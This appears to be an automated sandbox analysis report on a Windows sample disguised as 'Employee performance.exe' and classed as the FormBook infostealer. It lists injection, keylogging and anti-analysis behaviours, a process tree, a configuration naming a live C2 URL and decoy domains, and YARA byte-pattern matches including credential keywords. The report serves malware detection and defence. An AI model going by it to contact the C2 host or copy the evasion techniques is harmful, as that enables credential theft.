Edit tour

Windows Analysis Report
Employee performance.exe

Overview

General Information

Sample name:	Employee performance.exe
Analysis ID:	1488013
MD5:	dca3f0ad0eaa9ed5eabfab13b8e5e72c
SHA1:	2db545db06211a8dd2317e9e08b5fdfc3431ca28
SHA256:	2f1f6bee630ceab483495b681e2468e018f6a9f2f28842d9ac7b40cf1e621f08
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Employee performance.exe (PID: 4944 cmdline: "C:\Users\user\Desktop\Employee performance.exe" MD5: DCA3F0AD0EAA9ED5EABFAB13B8E5E72C)

svchost.exe (PID: 4132 cmdline: "C:\Users\user\Desktop\Employee performance.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

control.exe (PID: 4644 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)

cmd.exe (PID: 7212 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ladonbet.xyz/lm31/"], "decoy": ["dr-shahmoradi.com", "mogu.live", "antoni-tapies.com", "fhwz79.com", "worldskillscompetition.com", "521b421.com", "jinchenlan.com", "beenprintin.com", "easysnatch.store", "cepatsukses.pro", "yepyepper.com", "privateschoolwichita.com", "vanguardartisan.com", "hbvc.xyz", "17eclbet.com", "loki360store.com", "greatfinland.com", "pranaimed.com", "20587.asia", "stelariptv.com", "malarosa.com", "momsfreedomfund.com", "hhkpay.com", "inventariarte.com", "mcgregur.xyz", "fibromyalgia-78113.bond", "greate-electronics.com", "k5h2o.top", "sunandmoonksa.com", "cms-software.shop", "kovacsking.shop", "keluargasabang.com", "donerightconcreting.com", "klikslotasia.site", "cheapoakleys-jp.com", "mchlive.com", "58644.xyz", "rtpgacordewa288.com", "dutyanddapper.com", "epostnewmtoken3.site", "delkhah-shop.com", "izziepay.com", "la-lljs.com", "avf2q6n.xyz", "09gmpvp51.com", "studiolab-design.com", "simhabet.live", "itsriskguardian.com", "pisangbetjuara.com", "onlyfitzzh.com", "web3fund.xyz", "hotelsanmartino.com", "xn--4oq20hs9irtk.icu", "nw27d.top", "supapet.shop", "sheenoo.com", "shabaguanfang.com", "webxwhiz.com", "sweatxin.com", "luxedecorgoods.com", "warpateam.com", "qik4eh.com", "311344.club", "blacktripadvisors.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.3741729017.00000000118D2000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xab2:$a2: pass 0xab8:$a3: email 0xabf:$a4: login 0xac6:$a5: signin 0xad7:$a6: persistent 0xcaa:$r1: C:\Users\user\AppData\Roaming\NN3QO770\NN3log.ini
0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Employee performance.exe PID: 4944	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x112ebf:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 4132	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x38358:$a1: 3C 30 50 4F 53 54 74 09 40 0xe2d52:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: control.exe PID: 4644	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xb2fb5:$a1: 3C 30 50 4F 53 54 74 09 40 0xb472a:$a1: 3C 30 50 4F 53 54 74 09 40 0x153c50:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Employee performance.exe.15e0000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Employee performance.exe.15e0000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Employee performance.exe.15e0000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Employee performance.exe.15e0000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Employee performance.exe.15e0000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Employee performance.exe.15e0000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
